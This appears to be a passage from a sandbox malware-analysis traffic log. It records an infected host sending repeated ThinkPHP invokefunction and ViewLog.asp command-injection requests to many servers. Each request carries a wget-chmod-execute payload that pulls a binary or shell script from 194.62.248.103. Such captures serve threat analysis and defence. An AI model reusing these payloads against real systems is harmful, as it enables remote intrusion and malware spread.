                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 31 36 61 36 34 35 66 26 23 34 36 3b 31 37 31 33 31 30 35 33 39 38 26 23 34 36 3b 31 64 61 32 62 34 61 31 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 36 31 36 61 36 34 35 66 26 23 34 36 3b 31 37 31 33 31 30 35 33 39 38 26 23 34 36 3b 31 64 61 32 62 34 61 31 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;616a645f&#46;1713105398&#46;1da2b4a1<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;616a645f&#46;1713105398&#46;1da2b4a1</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        649192.168.2.2359636112.125.127.4280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:38.067722082 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:38.383706093 CEST188INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:28 GMT
                                                        Server: Apache
                                                        Content-Length: 11
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                                                        Data Ascii: Bad Request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        650192.168.2.2338814112.74.112.17480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:38.078270912 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:38.406152964 CEST161INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html
                                                        Date: Sun, 14 Apr 2024 14:36:38 GMT
                                                        Connection: close
                                                        Content-Length: 20
                                                        Data Raw: 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e
                                                        Data Ascii: <h1>Bad Request</h1>
                                                        Apr 14, 2024 16:36:41.320390940 CEST161INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html
                                                        Date: Sun, 14 Apr 2024 14:36:38 GMT
                                                        Connection: close
                                                        Content-Length: 20
                                                        Data Raw: 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e
                                                        Data Ascii: <h1>Bad Request</h1>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        651192.168.2.235518488.6.25.4880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:38.078777075 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:38.416378975 CEST430INHTTP/1.1 404 Not Found
                                                        Server: micro_httpd
                                                        Cache-Control: no-cache
                                                        Pragma: no-cache
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: frame-ancestors 'self';default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval';style-src 'self' 'unsafe-inline'
                                                        X-XSS-Protection: 1; mode=block
                                                        X-Content-Type-Options: 'nosniff'
                                                        Date: Sun, 14 Apr 2024 16:36:45 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Apr 14, 2024 16:36:38.418097019 CEST435INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 6d 65 74 61 20 48 54 54 50 2d 45 51 55 49 56 3d 27 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 27 20 43 4f 4e 54 45 4e 54 3d 27
                                                        Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE><meta HTTP-EQUIV='Cache-Control' CONTENT='no-cache'><meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.a


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        652192.168.2.2333048112.163.49.11280
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:38.343962908 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:38.630737066 CEST504INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Sun, 14 Apr 2024 14:36:38 GMT
                                                        Server: lighttpd/1.4.37
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        653192.168.2.233345231.136.25.1268080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:38.506997108 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:39.447797060 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:41.335515976 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:45.239110947 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:52.917912006 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:08.019901991 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:38.735527992 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        654192.168.2.233760031.136.145.2228080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:38.507611990 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:39.479835033 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:41.399647951 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:45.239123106 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:52.918045044 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:08.275897026 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:38.735541105 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        655192.168.2.235153231.136.71.1068080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:38.511935949 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:39.479835033 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:41.399647951 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:45.239123106 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:52.918045044 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:08.275897026 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:40.783272982 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        656192.168.2.235246494.120.146.1298080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:38.536597967 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        657192.168.2.236012294.121.35.2098080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:38.553111076 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        658192.168.2.2358658112.122.159.6580
                                                        TimestampBytes transferredDirectionData
